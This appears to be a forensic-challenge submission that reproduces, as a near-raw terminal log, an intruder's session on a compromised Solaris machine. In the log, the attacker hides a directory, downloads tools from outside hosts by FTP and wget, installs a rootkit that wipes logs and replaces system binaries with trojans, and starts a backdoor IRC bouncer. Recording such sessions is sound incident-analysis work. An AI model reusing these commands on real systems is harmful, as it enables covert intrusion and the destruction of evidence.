Scan of the Month

Scan 28
Submission by Leon Ward (nard)

Diagram of attack: 1

List of commands used by attacker to install backdoor's etc

# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
# wget
wget: not found
# w
9:44am up 13 day(s), 4:24, 0 users, load average: 0.00, 0.00, 0.01
User tty login@ idle JCPU PCPU what
# /bin/sh -i
unset HISTFILE
# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
#
#
# ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:joka

get wget
get dlp
get solbnc
get iupv6sun
Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit
# ls
dlp
ipv6sun
solbnc
wget
# chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
# ./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58-- http://62.211.66.53:80/bobzz/sol.tar.gz
=> `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]

1800K -> .......... .......... .......... .......... [100%]

09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]

# rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
# cd sol
sol: does not exist
# ./setup
./setup: not found
# cd sol
sol: does not exist
# tar -xf sol.tar.gz
# cd sol
# ./setup
[0;36mbobz oN ircNet on join #privè
/\ /\
_/ \ ___| Autor: bobz |___ / \_
\ / \ /
\/ \/

********
******** ** ** **
** ** ** * *
******* ********** ** ** * *
******* ** ** ****** ********
** ** ** ****** **********
******* ** ** ** ** ** **
******* ** ** ** ** ** **
********** ** ** ** **
/\ /\
_/ \ ___| Autor: bobz |___ / \_
\ / \ /
\/ \/

...:::[ Autore bobz ]:::...
...:::[ On IRcnEt On Join #bobz ]:::...

Ti:AmO:RosariADelete Logz...
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by warning
[1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
[1;37m*[0;37m Checking for existing rootkits..
[1;37m*[0;37m Checking for existing rootkits..
[1;37m*[0;37m checking /etc/rc2 and /etc/rc3 for rootkits...
[1;37m*[0;37m Rootkits Removed from config files
[1;37m*[0;37m checking crond configs for rootkits...
[1;37m*[0;37m Rootkits Removed from crond config files
[1;31m*** WARNING ***[0;37m 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password :
mixer
[1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port :
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port :
7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done.
[1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher...
* Patching...
DTSCD PATCHED
LPD PATCHED
fingerd
cmsd
ttdbserverd
sadmind
statd
rquotad
rusersd
cachefsd
bindshells
snmpXdmid
Done.

--09:56:21-- ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
=> `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)

0K -> .......... .......... ...... [100%]

09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]

Archive: 111085-02.zip
creating: 111085-02/
inflating: 111085-02/.diPatch
creating: 111085-02/SUNWcsu/
inflating: 111085-02/SUNWcsu/pkgmap
inflating: 111085-02/SUNWcsu/pkginfo
creating: 111085-02/SUNWcsu/install/
inflating: 111085-02/SUNWcsu/install/checkinstall
inflating: 111085-02/SUNWcsu/install/copyright
inflating: 111085-02/SUNWcsu/install/i.none
inflating: 111085-02/SUNWcsu/install/patch_checkinstall
inflating: 111085-02/SUNWcsu/install/patch_postinstall
inflating: 111085-02/SUNWcsu/install/postinstall
inflating: 111085-02/SUNWcsu/install/preinstall
creating: 111085-02/SUNWcsu/reloc/
creating: 111085-02/SUNWcsu/reloc/usr/
creating: 111085-02/SUNWcsu/reloc/usr/bin/
inflating: 111085-02/SUNWcsu/reloc/usr/bin/login
inflating: 111085-02/README.111085-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

PaTcH_MsG 2 Patch number 111085-02 is already applied.

Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.
--09:56:49-- ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
=> `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)

1000K -> .................................................... [100%]

10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]

Archive: 108949-07.zip
creating: 108949-07/
inflating: 108949-07/.diPatch
inflating: 108949-07/postbackout
creating: 108949-07/SUNWdtbas/
inflating: 108949-07/SUNWdtbas/pkgmap
inflating: 108949-07/SUNWdtbas/pkginfo
creating: 108949-07/SUNWdtbas/install/
inflating: 108949-07/SUNWdtbas/install/checkinstall
inflating: 108949-07/SUNWdtbas/install/copyright
inflating: 108949-07/SUNWdtbas/install/depend
inflating: 108949-07/SUNWdtbas/install/i.none
inflating: 108949-07/SUNWdtbas/install/patch_checkinstall
inflating: 108949-07/SUNWdtbas/install/patch_postinstall
inflating: 108949-07/SUNWdtbas/install/postinstall
inflating: 108949-07/SUNWdtbas/install/preinstall
creating: 108949-07/SUNWdtbas/reloc/
creating: 108949-07/SUNWdtbas/reloc/dt/
creating: 108949-07/SUNWdtbas/reloc/dt/lib/
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1
creating: 108949-07/SUNWdtbax/
inflating: 108949-07/SUNWdtbax/pkgmap
inflating: 108949-07/SUNWdtbax/pkginfo
creating: 108949-07/SUNWdtbax/install/
inflating: 108949-07/SUNWdtbax/install/checkinstall
inflating: 108949-07/SUNWdtbax/install/copyright
inflating: 108949-07/SUNWdtbax/install/depend
inflating: 108949-07/SUNWdtbax/install/i.none
inflating: 108949-07/SUNWdtbax/install/patch_checkinstall
inflating: 108949-07/SUNWdtbax/install/patch_postinstall
inflating: 108949-07/SUNWdtbax/install/postinstall
inflating: 108949-07/SUNWdtbax/install/preinstall
creating: 108949-07/SUNWdtbax/reloc/
creating: 108949-07/SUNWdtbax/reloc/dt/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1
inflating: 108949-07/postpatch
inflating: 108949-07/README.108949-07
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

Installation of <SUNWdtbas> was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

Installation of <SUNWdtbax> was successful.
Archive: 111606-02.zip
creating: 111606-02/
inflating: 111606-02/.diPatch
creating: 111606-02/SUNWftpu/
inflating: 111606-02/SUNWftpu/pkgmap
inflating: 111606-02/SUNWftpu/pkginfo
creating: 111606-02/SUNWftpu/install/
inflating: 111606-02/SUNWftpu/install/checkinstall
inflating: 111606-02/SUNWftpu/install/copyright
inflating: 111606-02/SUNWftpu/install/i.none
inflating: 111606-02/SUNWftpu/install/patch_checkinstall
inflating: 111606-02/SUNWftpu/install/patch_postinstall
inflating: 111606-02/SUNWftpu/install/postinstall
inflating: 111606-02/SUNWftpu/install/preinstall
creating: 111606-02/SUNWftpu/reloc/
creating: 111606-02/SUNWftpu/reloc/usr/
creating: 111606-02/SUNWftpu/reloc/usr/sbin/
inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd
inflating: 111606-02/README.111606-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

Installation of <SUNWftpu> was successful.
PS Trojaned[1;37m*[0;37m Primary network interface is of type: [0;36mhme[0;37m
[1;37m*[0;37m Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README Done.
[1;37m*[0;37m psyBNC has now been configured on port 7000 (default) with no IDENT
[1;37m*[0;37m erasing rootkit...
./setup: test: unknown operator 16
# ./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>
# cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by bobbino
root 167 1 0 Nov 16 ? 0:00 /usr/sbin/inetd -s
root 3325 3265 0 10:02:25 ? 0:00 grep inetd
---
Patch.....
Attivata by RyO
#
#

Next Slide